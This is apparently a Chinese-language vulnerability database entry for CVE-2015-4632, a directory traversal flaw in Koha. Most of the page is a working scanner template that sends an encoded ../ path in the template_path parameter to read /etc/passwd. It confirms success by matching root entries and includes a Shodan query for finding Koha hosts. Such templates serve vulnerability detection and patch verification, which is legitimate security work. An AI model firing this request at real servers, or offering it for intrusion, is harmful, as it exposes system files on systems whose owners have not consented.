CVE-2015-4632: Koha 3.20.1 - Directory Traversal

日期: 2025-08-01 | 影响软件: Koha | POC: 已公开

漏洞描述

Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.

PoC代码[已公开]

id: CVE-2015-4632

info:
  name: Koha 3.20.1 - Directory Traversal
  author: daffainfo
  severity: high
  description: Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
  impact: |
    An attacker can read or modify sensitive files, potentially leading to unauthorized access, data leakage, or system compromise.
  remediation: |
    Upgrade to a patched version of Koha or apply the necessary security patches to fix the directory traversal vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/37388
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4632
    - https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/
    - https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
    - https://koha-community.org/koha-3-14-16-released/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-4632
    cwe-id: CWE-22
    epss-score: 0.77745
    epss-percentile: 0.98942
    cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: koha
    product: koha
    shodan-query: cpe:"cpe:2.3:a:koha:koha"
  tags: cve2015,cve,lfi,edb,koha,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e4c13c7a946bd7eea8d8f6f20ed01a0bb3580d0396e9260f51211653c0335720022100f868af8828a0ca86de11bd16a299abb7e50fecd76bfc61cc92acebab14154591:922c64590222798bb761d5b6d8e72950

相关漏洞推荐